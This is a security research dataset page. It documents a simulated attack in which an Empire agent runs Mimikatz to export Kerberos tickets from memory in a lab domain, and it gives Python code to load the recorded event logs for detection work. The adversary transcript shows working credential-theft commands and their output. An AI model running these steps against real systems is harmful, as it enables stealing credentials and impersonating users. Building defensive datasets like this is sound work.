Empire Mimikatz Extract Kerberos Keys

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2019/09/21

Tactics

TA0006

Techniques

T1003.004

Tags

Kerberos Tickets

Dataset Description

This dataset represents adversaries extracting kerberos tickets from memory.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

extract_tickets

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 07:35:29  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > info

              Name: Invoke-Mimikatz extract kerberos tickets.
            Module: powershell/credentials/mimikatz/extract_tickets
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract
  kerberos tickets from memory in base64-encoded form.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  Agent True        WE8XYD3K                  Agent to run module on.                 

(Empire: powershell/credentials/mimikatz/extract_tickets) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 1
[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > 
Job started: PY68ZG

Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # standard::base64
isBase64InterceptInput  is false
isBase64InterceptOutput is false

mimikatz(powershell) # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac      
  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM
  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL
  Client Name       : pgustavo @ THESHIRE.LOCAL
  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi

(Empire: powershell/credentials/mimikatz/extract_tickets) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_extract_keys.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)